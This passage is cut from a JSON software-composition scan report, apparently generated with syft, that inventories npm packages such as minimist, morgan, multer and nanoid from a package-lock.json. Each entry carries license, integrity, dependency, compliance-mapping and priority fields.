"sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "dependencies": { "mime-db": "1.52.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "39275c688371843a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: minimatch 9.0.9", "title": "minimatch 9.0.9", "description": "Package discovered: minimatch 9.0.9", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "dadb042585b0fc99", "name": "minimatch", "version": "9.0.9", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:minimatch_project:minimatch:9.0.9:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/minimatch@9.0.9", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz", "integrity": "sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==", "dependencies": { "brace-expansion": "^2.0.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fe3ea9bf939aec06", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: minimist 1.2.8", "title": "minimist 1.2.8", "description": "Package discovered: minimist 1.2.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bf8bc4c7577fa757", "name": "minimist", "version": "1.2.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:minimist:minimist:1.2.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/minimist@1.2.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "43d359d2fd9254cd", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: minipass 7.1.3", "title": "minipass 7.1.3", "description": "Package discovered: minipass 7.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "a4e62963fcdf0651", "name": "minipass", "version": "7.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "BlueOak-1.0.0", "spdxExpression": "BlueOak-1.0.0", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:minipass:minipass:7.1.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/minipass@7.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "371d68f8a3e92216", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: mkdirp 0.5.6", "title": "mkdirp 0.5.6", "description": "Package discovered: mkdirp 0.5.6", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "4ee017b1ce1fca30", "name": "mkdirp", "version": "0.5.6", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:mkdirp:mkdirp:0.5.6:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/mkdirp@0.5.6", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "dependencies": { "minimist": "^1.2.6" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "85ab0a570b2a1b2d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: morgan 1.10.1", "title": "morgan 1.10.1", "description": "Package discovered: morgan 1.10.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0b0e2e978d7d93f4", "name": "morgan", "version": "1.10.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:morgan_project:morgan:1.10.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/morgan@1.10.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/morgan/-/morgan-1.10.1.tgz", "integrity": "sha512-223dMRJtI/l25dJKWpgij2cMtywuG/WiUKXdvwfbhGKBhy1puASqXwFzmWZ7+K73vUPoR7SS2Qz2cI/g9MKw0A==", "dependencies": { "basic-auth": "~2.0.1", "debug": "2.6.9", "depd": "~2.0.0", "on-finished": "~2.3.0", "on-headers": "~1.1.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "19152fd7179a58f9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ms 2.0.0", "title": "ms 2.0.0", "description": "Package discovered: ms 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "46f1aa86e531772d", "name": "ms", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:vercel:ms:2.0.0:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/ms@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c6acafac62af1ee0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ms 2.1.3", "title": "ms 2.1.3", "description": "Package discovered: ms 2.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bb1077662b3cb7e0", "name": "ms", "version": "2.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:vercel:ms:2.1.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/ms@2.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ffedfc57a9f39743", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: multer 1.4.5-lts.2", "title": "multer 1.4.5-lts.2", "description": "Package discovered: multer 1.4.5-lts.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "775c553ab4f0a485", "name": "multer", "version": "1.4.5-lts.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/multer@1.4.5-lts.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/multer/-/multer-1.4.5-lts.2.tgz", "integrity": "sha512-VzGiVigcG9zUAoCNU+xShztrlr1auZOlurXynNvO9GiWD1/mTBbUljOKY+qMeazBqXgRnjzeEgJI/wyjJUHg9A==", "dependencies": { "append-field": "^1.0.0", "busboy": "^1.0.0", "concat-stream": "^1.5.2", "mkdirp": "^0.5.4", "object-assign": "^4.1.1", "type-is": "^1.6.4", "xtend": "^4.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9d7c97f3f3cb9ec0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: mz 2.7.0", "title": "mz 2.7.0", "description": "Package discovered: mz 2.7.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "96c78782a0a6a6e8", "name": "mz", "version": "2.7.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:mz:mz:2.7.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/mz@2.7.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/mz/-/mz-2.7.0.tgz", "integrity": "sha512-z81GNO7nnYMEhrGh9LeymoE4+Yr0Wn5McHIZMK5cfQCl+NDX08sCZgUc9/6MHni9IWuFLm1Z3HTCXu2z9fN62Q==", "dependencies": { "any-promise": "^1.0.0", "object-assign": "^4.0.1", "thenify-all": "^1.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "545c4a29aa435f71", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: nanoid 3.3.11", "title": "nanoid 3.3.11", "description": "Package discovered: nanoid 3.3.11", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fc2d97a12d1a4dda", "name": "nanoid", "version": "3.3.11", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:nanoid_project:nanoid:3.3.11:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/nanoid@3.3.11", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz", "integrity": "sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { 